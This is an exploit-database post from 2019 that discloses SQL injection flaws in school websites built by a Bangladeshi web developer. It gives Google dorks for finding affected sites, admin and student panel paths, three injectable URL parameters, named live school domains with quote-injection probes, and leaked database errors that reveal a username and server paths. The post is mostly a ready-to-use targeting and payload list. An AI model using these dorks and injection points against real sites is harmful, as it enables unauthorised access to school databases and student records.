facebook facebook twitter rss

Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
#####################################################################

# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
intext:''Powered by Sikder Computer'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084

#####################################################################

# Admin/Teacher/Student Panel Login Path :
***************************************

/PATH/admin/index
/PATH/students_panel/index

# SQL Injection Exploit :
***********************

[PATH]/view_gallery_meetings?page=[SQL Injection]

[PATH]/current_success_students_info?id=[SQL Injection]

[PATH]/ex_success_students_info?id=[SQL Injection]

#####################################################################

# Example Vulnerable Sites =>
*****************************

Note : (67.23.238.179) => There are 1,107 domains hosted on this server.

[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27

[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27

[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27

#####################################################################

# SQL Database Error :
*********************

Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost'
(using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3

Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in
/home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database ***No database found ***

Warning: mysql_query(): Access denied for user ''@'localhost'
(using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19

#####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#####################################################################

Like us on Facebook :